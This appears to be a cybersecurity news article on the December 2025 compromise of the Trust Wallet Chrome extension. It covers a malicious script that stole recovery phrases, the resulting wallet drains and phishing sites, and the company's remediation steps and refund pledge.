Many Trust Wallet users saw their wallets drained of over $7 million after a security breach in the Chrome browser extension version 2.68.0, released on December 24, 2025.
Blockchain investigator ZachXBT first flagged the incident on X, noting a surge in unauthorized outflows from affected addresses shortly after users interacted with the extension.
Reports emerged on Christmas Eve, with victims sharing screenshots of emptied portfolios, including significant holdings in ETH, BTC, SOL, and BNB.
One user claimed a $300,000 loss in minutes after simple authorization, with transactions funneled to multiple attacker-controlled addresses. PeckShield estimated initial losses at $6 million; Trust Wallet later confirmed approximately $7 million across hundreds of wallets.
The attack coincided with the Chrome Web Store extension update, affecting desktop users but sparing the mobile app. Security firm SlowMist issued an alert, describing a potential supply-chain compromise in which malicious code was injected upstream.
Malicious Code Exposed
Researchers examined a compromised bundle and found a JavaScript file named 4482.js that was masquerading as PostHog analytics. The obfuscated script activated on seed phrase import, silently exfiltrating sensitive wallet data, including recovery phrases, to api.metrics-trustwallet.com, a domain registered days earlier and mimicking official branding.
Public WHOIS records confirmed its novelty, with no ties to legitimate Trust Wallet infrastructure.
Attacker sophistication extended to parallel phishing: domains like fix-trustwallet.com lured panicked users with fake “vulnerability fixes,” prompting seed phrase entry for instant drains. The shared registrar across phishing sites suggests coordinated operations.
Trust Wallet acknowledged the breach on December 25 via X, isolated it to version 2.68.0, and urged immediate disablement. Users must navigate to chrome://extensions/?id=egjidjbpglichdcondbcbdnbeeppgdph, toggle off, enable developer mode, and update to v2.69, the sole safe iteration.
The team pledged full refunds to affected users, prioritized support outreach, and warned against unofficial DMs. Binance co-founder Changpeng Zhao hinted at possible insider involvement, amplifying scrutiny on the acquisition-owned wallet.
This breach underscores supply-chain perils in crypto extensions, where auto-updates bypass user scrutiny. Affected chains span EVM, Bitcoin, and Solana, with stolen funds laundered via mixers.
Cybersecurity experts recommend using new wallets for potentially exposed seeds and verifying updates vigilantly. As investigations continue, Trust Wallet’s refund process will test user trust amid 2025’s $3 billion in hacking losses.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
